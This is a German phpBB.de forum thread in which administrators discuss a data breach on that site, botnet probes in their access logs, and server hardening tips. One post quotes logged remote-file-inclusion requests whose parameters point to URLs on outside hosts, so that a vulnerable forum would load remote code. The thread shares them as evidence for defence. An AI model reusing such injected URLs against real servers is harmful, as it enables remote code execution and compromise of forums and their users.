Diskussion zu Benutzerdaten auf phpBB.de ausspioniert

Projekte der phpBB.de-Community und Feedback zu phpBB.de.
Benutzeravatar
nehcregit
Mitglied
Beiträge: 599
Registriert: 11.07.2002 20:59
Wohnort: Egelsbach
Kontaktdaten:

Beitrag von nehcregit »

Meistens im Verzeichnis "log".
SMFPortal.de - Deutscher Simple Machines Forum Support
achidler
Mitglied
Beiträge: 2
Registriert: 05.02.2008 21:30

Beitrag von achidler »

Bei diesen Einträgen in deinem Apache access_log handelt es sich um die Zugriffsversuche von Botnetzen die deinen Server auf bekannte Schwachstellen durchsuchen.

Anders ausgedrückt - solange du keine veraltete oder als gefährlich bekannte Software auf deinem Server liegen hast (gilt im übrigen auch für PHP und den Apache) kannst du dieses leider unvermeidliche Internet Hintergrundrauschen getrost ignorieren. Die einzige Alternative wäre deinen Server vom Netz zu nehmen.

Schau dir auch mal dein Systemlog an :wink:

Maßnahmen die du ansonsten treffen kannst:

- SSH Zugang zu deinem Server sichern (kein direkter Root Zugang/Port verlegen oder Zugang nur noch über Schlüsselaustausch möglich)
- Apache Konfiguration prüfen (mod_security verwenden + 'ServerTokens Prod' und 'TraceEnable Off' in der httpd.conf)
- chmod 0710 auf deinen Webroot und die darunterliegenden Verzeichnisse
- PHP Konfiguration prüfen (save_mode on, register_globals off, allow_url_fopen off + suhosin mod verwenden)
- Deinen Server updaten über yast, smart oder einen anderen Packetmanager
- Schau dir mal iptables (Packetfilter) an. Zusammen mit dem recent mod kann man interessante Dinge machen
- Schau dir mal fail2ban an
- Schau dir mal GRSECURITY (Kernel Patch) an
- Schau dir mal tripwire (Open Source Intrusion Detection System) an
- Schau dir an was dein Server so für treibt ('ps aux' und/oder 'netstat -pl' und verzichte auf unnötige Dienste)
- Kontrolliere das keine unnötigen Dateien auf deinem Server das setuid/setgid-Binarie gesetzt haben
allesweg
Mitglied
Beiträge: 148
Registriert: 06.09.2006 03:03
Wohnort: Hildesheim
Kontaktdaten:

Beitrag von allesweg »

nehcregit hat geschrieben:Meistens im Verzeichnis "log".
Danke, aber in finde ehrlich gesagt auch den Ordner nicht... :oops:
Zwei Dinge sind unendlich, das Universum und die menschliche Dummheit, aber bei dem Universum bin ich mir noch nicht ganz sicher. (A. Einstein)
Benutzeravatar
nickvergessen
Ehrenadmin
Beiträge: 11559
Registriert: 09.10.2006 21:56
Wohnort: Stuttgart, Germany
Kontaktdaten:

Beitrag von nickvergessen »

allesweg hat geschrieben:Danke, aber in finde ehrlich gesagt auch den Ordner nicht... :oops:
Wende dihc an deinen Hoster, vllt gesteht er dir diese auch nicht zu.
kein Support per PN
djmarten
Mitglied
Beiträge: 8
Registriert: 25.03.2007 21:58
Kontaktdaten:

Beitrag von djmarten »

@Seether

djmarten hat geschrieben:vielen dank für die info @phpbb team

auch wir musten gestern 2 versuchte angriffe feststellen

es wurde über 2 ips versucht,

Malaysia(MY) in region Asia
Spain(ES) in region Europe

und mit ca 50 links
siehe hier viewtopic.php?t=1187&postdays=0&postorder=http%3A%2F%2Fhonamfishing.co.kr%2Fphpmysqladmin%2Flibraries%2Foduzov%2Fneloze%2F&vote=viewresult

login.php?redirect=viewforum.php&f=41&start=http%3A%2F%2Fwww.felixtorresycia.com%2Fadmin%2Fcorreo%2Fenaq%2Fecib%2F

viewtopic.php?t=150&view=http%3A%2F%2Fwww.northfans.ch%2Fforum%2Fadmin%2Fsettings%2Fgucor%2Fujusu%2F
usw.

sonnst war eigendlich imemr ruhe, seit ewigkeiten, da libw-perl und co ehh gespert sind.
könnte da ein zusammenhang sein?
wie schon hier geschrieben, habe die selben zugriffe, mitlerweile 3 ips

.zz muste ich das forum offline nehmen das aus nicht erklärbaren gründen, alles sehr lahm ist.

auch haben sicherheitsscripte angeschlagen ( adminzugang) mehrfach loginversuche
djmarten
Mitglied
Beiträge: 8
Registriert: 25.03.2007 21:58
Kontaktdaten:

Beitrag von djmarten »

Edit by Dr.Death - Bild entfernt

aja :D muffsausen
Mitage
Mitglied
Beiträge: 4
Registriert: 05.05.2006 11:50

Beitrag von Mitage »

Ähm, tut mir echt leid, aber ich verstehe leider nur Bahnhof und mir brennt doch noch eine Frage auf der Seele.. :wink: Gilt diese Spionage der Benutzerdaten nur für Mitglieder dieses Supportforums oder ist mein eigenes bboard auch gefährdet. Muss ich die Mitglieder informieren & auch bitten die Passwörter zu ändern oder hat das beides gar nichts miteinander zu tun?? Wäre echt nett, wenn mir das jemand beantworten könnte. :wink:
Benutzeravatar
Schumi
Ehemaliges Teammitglied
Beiträge: 4925
Registriert: 07.10.2002 12:37

Beitrag von Schumi »

Wie bereits mehrfach erwähnt, besteht in keinster Weise ein derartiger Zusammenhang. Die Datenbank dieses Forums hier wurde ausgelesen über eine Schwachstelle, die nicht im Standard-phpBB-Paket vorhanden ist. Somit hat das ganze keinen Einfluss auf dein eigenes Forum (bzw sämtliche andere Foren).
Benutzeravatar
Jan500
Ehemaliges Teammitglied
Beiträge: 4199
Registriert: 01.03.2003 21:32
Wohnort: Hamburg
Kontaktdaten:

Beitrag von Jan500 »

die antwort findet man auf fast jeder der letzten seiten (vorallem am anfang) :roll:
"Life begins at 40 Knots...!" :D
kein (kostenlosen) Support per pn, mail, icq usw. | Kostenlosen Support gibt es hier im Forum!
Seether
Mitglied
Beiträge: 1446
Registriert: 10.10.2002 23:42

Beitrag von Seether »

djmarten hat geschrieben:@Seether

.zz muste ich das forum offline nehmen das aus nicht erklärbaren gründen, alles sehr lahm ist.
Schau mal bitte das an:
http://www.phpbb.de/viewtopic.php?t=164319

Ist das bei Dir so ähnlich?
Antworten

Zurück zu „Community Talk“